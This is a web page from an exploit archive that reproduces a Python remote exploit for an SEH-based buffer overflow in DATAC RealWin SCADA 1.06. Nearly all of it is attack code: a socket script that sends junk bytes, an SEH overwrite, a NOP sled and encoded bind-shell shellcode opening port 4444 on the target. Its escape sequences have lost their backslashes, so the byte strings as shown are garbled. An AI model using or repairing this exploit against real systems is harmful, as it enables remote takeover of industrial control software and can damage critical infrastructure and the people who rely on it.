DATAC RealWin SCADA 1.06 Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DATAC RealWin SCADA 1.06 Buffer Overflow Exploit
# Published : 2010-10-27
# Author : Blake
# Previous Title : XBMC 9.04.1r20672 soap_action_name post upnp sscanf Buffer Overflow
# Next Title : MinaliC Webserver 1.0 Remote Source Disclosure/File Download

# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)

import socket, sys

if len(sys.argv)!= 3:
    print "n[*] Usage: %s <ip> <port>n" % sys.argv[0]
    sys.exit(0)
 
host = sys.argv[1]
port = int(sys.argv[2])     # port 912 by default

# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
# LPORT=4444, 
shellcode =(
"xbaxe7x26x3bxa1x33xc9xb1x56xdbxcexd9x74x24xf4"
"x5dx83xc5x04x31x55x0bx03x55xecxc4xcex5dx1ax81"
"x31x9exdaxf2xb8x7bxebx20xdex08x59xf5x94x5dx51"
"x7exf8x75xe2xf2xd5x7ax43xb8x03xb4x54x0cx8cx1a"
"x96x0ex70x61xcaxf0x49xaax1fxf0x8exd7xefxa0x47"
"x93x5dx55xe3xe1x5dx54x23x6exddx2ex46xb1xa9x84"
"x49xe2x01x92x02x1ax2axfcxb2x1bxffx1ex8ex52x74"
"xd4x64x65x5cx24x84x57xa0xebxbbx57x2dxf5xfcx50"
"xcdx80xf6xa2x70x93xccxd9xaex16xd1x7ax25x80x31"
"x7axeax57xb1x70x47x13x9dx94x56xf0x95xa1xd3xf7"
"x79x20xa7xd3x5dx68x7cx7dxc7xd4xd3x82x17xb0x8c"
"x26x53x53xd9x51x3ex3cx2ex6cxc1xbcx38xe7xb2x8e"
"xe7x53x5dxa3x60x7ax9axc4x5bx3ax34x3bx63x3bx1c"
"xf8x37x6bx36x29x37xe0xc6xd6xe2xa7x96x78x5cx08"
"x47x39x0cxe0x8dxb6x73x10xaex1cx02x16x60x44x47"
"xf1x81x7ax76x5dx0fx9cx12x4dx59x36x8axafxbex8f"
"x2dxcfx94xa3xe6x47xa0xadx30x67x31xf8x13xc4x99"
"x6bxe7x06x1ex8dxf8x02x36xc4xc1xc5xccxb8x80x74"
"xd0x90x72x14x43x7fx82x53x78x28xd5x34x4ex21xb3"
"xa8xe9x9bxa1x30x6fxe3x61xefx4cxeax68x62xe8xc8"
"x7axbaxf1x54x2ex12xa4x02x98xd4x1exe5x72x8fxcd"
"xafx12x56x3ex70x64x57x6bx06x88xe6xc2x5fxb7xc7"
"x82x57xc0x35x33x97x1bxfex43xd2x01x57xccxbbxd0"
"xe5x91x3bx0fx29xacxbfxa5xd2x4bxdfxccxd7x10x67"
"x3dxaax09x02x41x19x29x07")


head = "x64x12x54x6Ax20x00x00x00xF4x1Fx00x00"
junk = "x41" * 228
next_seh = "xebx06x90x90"	# overwrites next seh
seh = "xeaxe3x02x40" 		# seh overwritten at 232 bytes - 4002e3ea
nops = "x90" * 20				# nop sled
junk2 = "x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode

print "n====================================" 
print "DATAC RealWin 1.06 Buffer Overflow"
print "Written by Blake"
print "Discovered by Luigi Auriemma"
print "Tested on Windows XP SP3"
print "====================================n"
 
print "[*] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,port))
except:
    print "[x] Error establishing connectionn"
    sys.exit(0)
 
print "[*] Sending payload"
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "rn")
s.close()
print "[*] Payload sent"
raw_input("[*] Press any key to exit...n")